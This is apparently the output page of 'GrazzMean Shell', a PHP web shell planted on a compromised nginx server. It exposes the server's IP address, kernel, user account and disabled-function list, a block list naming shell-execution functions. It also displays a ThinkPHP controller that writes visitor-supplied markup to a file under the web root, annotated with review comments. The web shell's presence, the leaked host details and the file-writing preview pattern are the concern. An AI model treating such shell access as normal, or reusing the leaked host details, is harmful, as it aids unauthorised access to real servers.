shell bypass 403

GrazzMean Shell

Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : Code.php
<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2020-08-10 http://myucms.com All rights reserved.
// +----------------------------------------------------------------------
// | Author: 梦雨 <50361804@qq.com>
// +----------------------------------------------------------------------
namespace app\index\controller;
use think\Controller;
use think\Db;
// NOTE(review): open_ts() is not defined in this file. It is called once at file
// load, before the controller class is declared. Confirm what it does, and
// whether any access check the actions below rely on lives there.
open_ts(); 
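/**
 * Controller for the "run HTML code" pages.
 *
 * Security context for reviewers: code_b() writes visitor-supplied markup to a
 * file next to the application and then redirects the browser to it. No
 * authentication or CSRF check is visible in this class; confirm whether
 * routing or open_ts() enforces one.
 */
class Code extends Controller
{
    /**
     * Render the code page, exposing the matching `code` row as `c` when an id
     * was supplied.
     *
     * @return mixed whatever view() returns for the code.html template
     */
    public function code()
    {
        $c = Db::name('code')->find(get('id'));
        if (get('id')) {
            $this->assign('c', $c);
        }
        // NOTE(review): set('tpl') becomes part of the template path; presumably
        // an admin-controlled setting. Confirm it cannot carry "../".
        return view(PATH.'/index/'.set('tpl').'/code/code.html');
    }

    /**
     * Render the "a" page: the stored row when one is found, otherwise the
     * value of set('title') as placeholder content.
     *
     * @return mixed whatever view() returns for the code_a.html template
     */
    public function code_a()
    {
        // NOTE(review): the second argument (0) is kept from the original; its
        // meaning depends on the framework version. Confirm it is intended.
        $c = Db::name('code')->find(get('id'), 0);
        // !empty() keeps the original truthiness test but does not index into
        // null when no row matched.
        if (!empty($c['id'])) {
            $this->assign('c', $c);
        } else {
            $code = set('title');
            $this->assign('content', $code);
        }
        return view(PATH.'/index/'.set('tpl').'/code/code_a.html');
    }

    /**
     * Write the markup to run into a fixed file and redirect the browser to it.
     *
     * Source of the markup, in order of precedence: the posted `content` field,
     * the stored row's content, or set('title').
     *
     * NOTE(review): the output file name is the same for every request, so
     * concurrent visitors overwrite each other's output, and the file is served
     * from the application's own origin, so any script in it runs with that
     * origin's cookies and storage. Serving the preview from a separate origin,
     * or with a `Content-Security-Policy: sandbox` response header, would
     * contain that; neither can be done from this method alone.
     *
     * @return void
     */
    public function code_b()
    {
        $c = Db::name('code')->find(get('id'));
        if (!empty($c['id'])) {
            $this->assign('c', $c);
            $code = stripslashes(seo($c['content']));
        } else {
            $code = set('title');
        }
        if (_post()) {
            // Accept only a plain string; a missing or array-valued field
            // becomes empty content instead of a warning and a null write.
            $posted = (isset($_POST['content']) && is_string($_POST['content'])) ? $_POST['content'] : '';
            // Unescape first and filter afterwards (see the write below). The
            // original filtered before stripslashes(), so the text that reached
            // disk was not the text the filter had inspected.
            $code = stripslashes($posted);
        }
        $file = md5('run') . '.html';
        // Filter at the point of writing so every source (POST, database row,
        // setting) goes through the same check.
        file_put_contents($file, $this->stripPhpTags($code));
        header("Location:./" . $file);
    }

    /**
     * Remove PHP blocks from markup before it is stored under the web root.
     *
     * The original pattern left the `?` of the closing tag unescaped, so it
     * ended at the first `>` rather than at `?>`, and it only recognised the
     * long `<?php` opener. This version removes every `<?` opener through its
     * closing tag, or through the end of the input when the tag is unclosed.
     * The pass is repeated until the text stops changing, so that deleting one
     * span cannot join the characters around it into a new opener.
     *
     * Whether the server ever hands .html files to PHP is not visible here;
     * this is defence in depth, not a substitute for that configuration.
     *
     * @param mixed $html markup to clean; non-scalar values yield ''
     * @return string the markup with PHP blocks removed, '' on a PCRE error
     */
    private function stripPhpTags($html)
    {
        if (!is_scalar($html)) {
            return '';
        }
        $html = (string) $html;
        do {
            $before = $html;
            $html = preg_replace('/<\?.*?(?:\?>|\z)/s', '', $before);
            if ($html === null) {
                // Fail closed: on a PCRE error write nothing rather than
                // unfiltered input.
                return '';
            }
        } while ($html !== $before);
        return $html;
    }
}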